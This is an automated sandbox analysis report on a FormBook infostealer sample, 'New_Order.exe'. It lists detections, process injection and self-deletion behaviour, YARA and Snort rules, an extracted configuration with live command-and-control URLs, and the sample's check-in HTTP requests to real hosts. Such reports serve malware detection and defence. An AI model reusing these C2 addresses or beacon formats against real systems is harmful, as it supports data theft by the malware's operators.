Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report New_Order.exe

Overview

General Information

Sample Name:New_Order.exe
Analysis ID:411746
MD5:74e4eb9afbf8f9c9b285a46ced831979
SHA1:8d65df9dc971c859f0a86a158d9576f528603410
SHA256:68c72cdcc504fcbffe3d6219cbeeed9586e0e362f073070eda7c0b4ed962d14a
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Dridex Process Pattern
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Suspicious Svchost Process
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • New_Order.exe (PID: 6216 cmdline: 'C:\Users\user\Desktop\New_Order.exe' MD5: 74E4EB9AFBF8F9C9B285A46CED831979)
    • svchost.exe (PID: 6252 cmdline: 'C:\Users\user\Desktop\New_Order.exe' MD5: FA6C268A5B5BDA067A901764D203D433)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wscript.exe (PID: 6712 cmdline: C:\Windows\SysWOW64\wscript.exe MD5: 7075DD7B9BE8807FCA93ACD86F724884)
          • cmd.exe (PID: 6816 cmdline: /c del 'C:\Windows\SysWOW64\svchost.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.voiceclubdubai.com/icsm/"], "decoy": ["roastedorganic.com", "dh1002020.com", "yologgook.com", "bg1133.com", "letsreflectonline.net", "year-action.xyz", "shanghainternational.com", "lanarkshirecleaningservices.com", "ahorradoramente.com", "kantan-sedori.com", "arshpowerelectrical.com", "thepagan.life", "hkequan.com", "1ratedfivegnetwork.com", "desailldada.com", "algaeflipflops.com", "connorneill.com", "fareblog01.com", "fjfortuny.com", "logictech.info", "bathtest.com", "truckwellfreight.com", "guesttransparent.com", "coffeyquiltco.com", "goorganickw.com", "12clyderoad.com", "hdjakdhf.com", "meloncholica.com", "happyfingersfood.com", "web3kit.com", "tmtbarsuppliers.com", "blackradstore.com", "lomejorparasalud.com", "dasabito.com", "shopperzguide.com", "portsalernoboatrental.com", "keywestshaman.com", "clarocrdemo.com", "cafesmexico.com", "lagemanndentistry.com", "nortonviggiano.com", "accuworkflow.com", "cankuntech.com", "the-evening-code.com", "westervillelegends.com", "susanestuart.com", "cunerier.com", "nicustoms.academy", "avocats-biaisetassocies.com", "w-c727or.net", "websitemax.co.uk", "nrlalivelearning.com", "thehostessedit.com", "heauxceaux.com", "case72-paypal.com", "charmboutiques.com", "thelordnelsonwinthorpe.com", "landbkids.com", "mowingpedia.com", "katherinegazda.com", "geacasolaro.com", "masautonomo.com", "quietaustraliansstandup.com", "bellarealestatebkk.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 16 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.svchost.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.svchost.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158b9:$sqlite3step: 68 34 1C 7B E1
        • 0x159cc:$sqlite3step: 68 34 1C 7B E1
        • 0x158e8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
        • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
        0.2.New_Order.exe.24e0000.4.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          0.2.New_Order.exe.24e0000.4.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 7 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Dridex Process PatternShow sources
          Source: Process startedAuthor: Florian Roth, oscd.community: Data: Command: 'C:\Users\user\Desktop\New_Order.exe' , CommandLine: 'C:\Users\user\Desktop\New_Order.exe' , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: 'C:\Users\user\Desktop\New_Order.exe' , ParentImage: C:\Users\user\Desktop\New_Order.exe, ParentProcessId: 6216, ProcessCommandLine: 'C:\Users\user\Desktop\New_Order.exe' , ProcessId: 6252
          Sigma detected: Suspicious Svchost ProcessShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\user\Desktop\New_Order.exe' , CommandLine: 'C:\Users\user\Desktop\New_Order.exe' , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: 'C:\Users\user\Desktop\New_Order.exe' , ParentImage: C:\Users\user\Desktop\New_Order.exe, ParentProcessId: 6216, ProcessCommandLine: 'C:\Users\user\Desktop\New_Order.exe' , ProcessId: 6252
          Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
          Source: Process startedAuthor: vburov: Data: Command: 'C:\Users\user\Desktop\New_Order.exe' , CommandLine: 'C:\Users\user\Desktop\New_Order.exe' , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: 'C:\Users\user\Desktop\New_Order.exe' , ParentImage: C:\Users\user\Desktop\New_Order.exe, ParentProcessId: 6216, ProcessCommandLine: 'C:\Users\user\Desktop\New_Order.exe' , ProcessId: 6252

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.voiceclubdubai.com/icsm/"], "decoy": ["roastedorganic.com", "dh1002020.com", "yologgook.com", "bg1133.com", "letsreflectonline.net", "year-action.xyz", "shanghainternational.com", "lanarkshirecleaningservices.com", "ahorradoramente.com", "kantan-sedori.com", "arshpowerelectrical.com", "thepagan.life", "hkequan.com", "1ratedfivegnetwork.com", "desailldada.com", "algaeflipflops.com", "connorneill.com", "fareblog01.com", "fjfortuny.com", "logictech.info", "bathtest.com", "truckwellfreight.com", "guesttransparent.com", "coffeyquiltco.com", "goorganickw.com", "12clyderoad.com", "hdjakdhf.com", "meloncholica.com", "happyfingersfood.com", "web3kit.com", "tmtbarsuppliers.com", "blackradstore.com", "lomejorparasalud.com", "dasabito.com", "shopperzguide.com", "portsalernoboatrental.com", "keywestshaman.com", "clarocrdemo.com", "cafesmexico.com", "lagemanndentistry.com", "nortonviggiano.com", "accuworkflow.com", "cankuntech.com", "the-evening-code.com", "westervillelegends.com", "susanestuart.com", "cunerier.com", "nicustoms.academy", "avocats-biaisetassocies.com", "w-c727or.net", "websitemax.co.uk", "nrlalivelearning.com", "thehostessedit.com", "heauxceaux.com", "case72-paypal.com", "charmboutiques.com", "thelordnelsonwinthorpe.com", "landbkids.com", "mowingpedia.com", "katherinegazda.com", "geacasolaro.com", "masautonomo.com", "quietaustraliansstandup.com", "bellarealestatebkk.com"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\nshC36E.tmp\a9g5j8lkcs3.dllReversingLabs: Detection: 44%
          Multi AV Scanner detection for submitted fileShow sources
          Source: New_Order.exeVirustotal: Detection: 38%Perma Link
          Source: New_Order.exeReversingLabs: Detection: 59%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: New_Order.exeJoe Sandbox ML: detected
          Source: 0.2.New_Order.exe.24e0000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.svchost.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: New_Order.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: New_Order.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscript.pdbGCTL source: svchost.exe, 00000001.00000002.278512625.0000000003890000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000002.510158064.0000000007180000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: New_Order.exe, 00000000.00000003.230980266.0000000002AF0000.00000004.00000001.sdmp, svchost.exe, 00000001.00000003.237522923.0000000003700000.00000004.00000001.sdmp, wscript.exe, 00000007.00000002.496537518.0000000004840000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: New_Order.exe, 00000000.00000003.230980266.0000000002AF0000.00000004.00000001.sdmp, svchost.exe, wscript.exe
          Source: Binary string: wscript.pdb source: svchost.exe, 00000001.00000002.278512625.0000000003890000.00000040.00000001.sdmp
          Source: Binary string: svchost.pdb source: wscript.exe, 00000007.00000002.497952984.0000000004D77000.00000004.00000001.sdmp
          Source: Binary string: svchost.pdbUGP source: wscript.exe, 00000007.00000002.497952984.0000000004D77000.00000004.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000002.510158064.0000000007180000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\New_Order.exeCode function: 0_2_0040646B FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\New_Order.exeCode function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 91.148.168.141:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 91.148.168.141:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 91.148.168.141:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49718 -> 62.149.189.71:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49718 -> 62.149.189.71:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49718 -> 62.149.189.71:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 85.233.160.22:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 85.233.160.22:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 85.233.160.22:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49725 -> 8.210.40.49:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49725 -> 8.210.40.49:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49725 -> 8.210.40.49:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 34.102.136.180:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.voiceclubdubai.com/icsm/
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.year-action.xyz
          Source: global trafficHTTP traffic detected: GET /icsm/?zZSlDz=zaS0K7Z6s3udRIV54ona/Y7FMvuM79U9hGlb72LKWqTP1QF33lUaB5+awkVfTrm4Szdf&b6jPH=FBZdWxvpgT HTTP/1.1Host: www.roastedorganic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=S3hZ9hucZB3EtOR58Q5nEiimGsTcBclBSgHOETXnBYv0klj7oHI8wHmFL3huZKvOqIBH HTTP/1.1Host: www.voiceclubdubai.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=7Y2cvYyrvfqxgunt3pZhUV8c5sAKyRnRxEqYxYZ4IV2yKeALIaVm9IYD5cxomw6uu8uh HTTP/1.1Host: www.geacasolaro.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /icsm/?zZSlDz=abv0Zjoypqon102KK4Aabri2R1obo2mniMfeUFfIxPUpBgCKzPX+m7Nu7myx3UJKSvBt&b6jPH=FBZdWxvpgT HTTP/1.1Host: www.charmboutiques.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=bWXej36VQHpcttmtRFRFltU4ahfDKjPxw8enIUkEUFX2dD9DLv700yN2zBLMaSA3vN4R HTTP/1.1Host: www.websitemax.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /icsm/?zZSlDz=logo8bpUoQPWTQLlZghyT7WZQjxZBYpYOJDMMbKRF5+Nw+24xZrLdIoslO6i49yZrWE6&b6jPH=FBZdWxvpgT HTTP/1.1Host: www.year-action.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=TR2dy7NfXkcYQth3vstvigvFAK3lzNu6618cspSNEjM/3bTBgf6HWtuv8wkgUujUQhHp HTTP/1.1Host: www.hdjakdhf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /icsm/?zZSlDz=LFJNa/qc3hvrLE0QUTB49n97WnaBmuBdNse4fNn2XI4P2ly5LcfV2yqmdABiPtDvfVQd&b6jPH=FBZdWxvpgT HTTP/1.1Host: www.susanestuart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 75.2.115.196 75.2.115.196
          Source: Joe Sandbox ViewIP Address: 23.227.38.74 23.227.38.74
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: ARUBA-ASNIT ARUBA-ASNIT
          Source: Joe Sandbox ViewASN Name: TELEPOINTBG TELEPOINTBG
          Source: global trafficHTTP traffic detected: GET /icsm/?zZSlDz=zaS0K7Z6s3udRIV54ona/Y7FMvuM79U9hGlb72LKWqTP1QF33lUaB5+awkVfTrm4Szdf&b6jPH=FBZdWxvpgT HTTP/1.1Host: www.roastedorganic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=S3hZ9hucZB3EtOR58Q5nEiimGsTcBclBSgHOETXnBYv0klj7oHI8wHmFL3huZKvOqIBH HTTP/1.1Host: www.voiceclubdubai.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=7Y2cvYyrvfqxgunt3pZhUV8c5sAKyRnRxEqYxYZ4IV2yKeALIaVm9IYD5cxomw6uu8uh HTTP/1.1Host: www.geacasolaro.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /icsm/?zZSlDz=abv0Zjoypqon102KK4Aabri2R1obo2mniMfeUFfIxPUpBgCKzPX+m7Nu7myx3UJKSvBt&b6jPH=FBZdWxvpgT HTTP/1.1Host: www.charmboutiques.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=bWXej36VQHpcttmtRFRFltU4ahfDKjPxw8enIUkEUFX2dD9DLv700yN2zBLMaSA3vN4R HTTP/1.1Host: www.websitemax.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /icsm/?zZSlDz=logo8bpUoQPWTQLlZghyT7WZQjxZBYpYOJDMMbKRF5+Nw+24xZrLdIoslO6i49yZrWE6&b6jPH=FBZdWxvpgT HTTP/1.1Host: www.year-action.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=TR2dy7NfXkcYQth3vstvigvFAK3lzNu6618cspSNEjM/3bTBgf6HWtuv8wkgUujUQhHp HTTP/1.1Host: www.hdjakdhf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /icsm/?zZSlDz=LFJNa/qc3hvrLE0QUTB49n97WnaBmuBdNse4fNn2XI4P2ly5LcfV2yqmdABiPtDvfVQd&b6jPH=FBZdWxvpgT HTTP/1.1Host: www.susanestuart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.roastedorganic.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Wed, 12 May 2021 04:11:08 GMTContent-Type: text/html; charset=utf-8Content-Length: 253Connection: closeX-Varnish: 824312071Retry-After: 5Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 45 72 72 6f 72 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 20 20 20 3c 70 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 20 20 3c 68 33 3e 47 75 72 75 20 4d 65 64 69 74 61 74 69 6f 6e 3a 3c 2f 68 33 3e 0a 20 20 20 20 3c 70 3e 58 49 44 3a 20 38 32 34 33 31 32 30 37 31 3c 2f 70 3e 0a 20 20 20 20 3c 68 72 3e 0a 20 20 20 20 3c 70 3e 56 61 72 6e 69 73 68 20 63 61 63 68 65 20 73 65 72 76 65 72 3c 2f 70 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html> <head> <title>404 Not Found</title> </head> <body> <h1>Error 404 Not Found</h1> <p>Not Found</p> <h3>Guru Meditation:</h3> <p>XID: 824312071</p> <hr> <p>Varnish cache server</p> </body></html>
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: New_Order.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: New_Order.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
